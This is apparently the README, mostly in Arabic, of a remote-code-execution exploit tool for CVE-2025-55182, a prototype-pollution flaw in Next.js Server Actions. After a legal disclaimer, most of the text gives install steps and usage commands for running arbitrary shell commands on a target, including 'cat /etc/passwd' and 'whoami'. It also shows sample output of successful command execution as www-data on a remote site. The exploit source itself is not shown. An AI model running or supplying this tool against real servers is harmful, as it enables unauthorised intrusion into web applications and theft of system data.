
CVE-2025-55182 Next.js RCE أداة استغلال
الوثيقة الصينية | تحليل مبدأ الثغرة
[!CAUTION]
⚠️ إخلاء مسؤولية - اقرأ قبل الاستخدام
هذه الأداة مخصصة فقط لما يلي:
- الباحثون الأمنيون الذين يجرون التحقق من الثغرات
- اختبار الاختراق المصرح به بإذن صريح
- الأغراض التعليمية والتعلمية
الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني.
باستخدام هذه الأداة، فإنك توافق على ما يلي:
- حصولك على الإذن المناسب قبل اختبار أي نظام
- عدم استخدام هذه الأداة لأغراض خبيثة
- تحملك المسؤولية الكاملة عن أفعالك وأي عواقب
لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذه الأداة.
أداة استغلال للتنفيذ عن بُعد (RCE) تستهدف ثغرة تلوث النموذج الأولي (prototype pollution) في جانب الخادم في Next.js.
CVE-2025-55182 هي ثغرة أمنية خطيرة تؤثر على Next.js وتسمح للمهاجمين بتحقيق تنفيذ عن بُعد للكود من خلال طلبات مُصممة خصيصًا تستغل تلوث النموذج الأولي (prototype pollution).
📖 للتحليل الفني المفصل، انظر EXPLOIT.md
تستغل هذه الثغرة آلية معالجة طلبات Server Actions في Next.js، مما يحقق تنفيذًا تعسفيًا للكود من خلال تلويث سلسلة النموذج الأولي عبر __proto__ بالتزامن مع مُنشئ Function.
# Using yarn
yarn install
# Using npm
npm install
# Basic usage
node index.js <target_url> [command]
# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
# Run the tool
yarn start http://localhost:3000 "whoami"
# Or use alias
yarn exploit http://localhost:3000 "ls -la"
# Show help
yarn help
# Link globally
yarn link
# or
npm link
# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"
# Unlink
yarn unlink
Usage:
cve-2025-55182 <url> [command]
Arguments:
url Target URL (required)
command Command to execute (default: whoami)
Options:
-h, --help Show help message
-v, --version Show version number
تُخرج الأداة النتائج بصيغة JSON:
{
"success": true,
"message": "",
"data": "command execution result"
}
{
"success": false,
"message": "error message",
"data": null
}
$ cve-2025-55182 http://vulnerable-site.com "id"
{
"success": true,
"message": "",
"data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}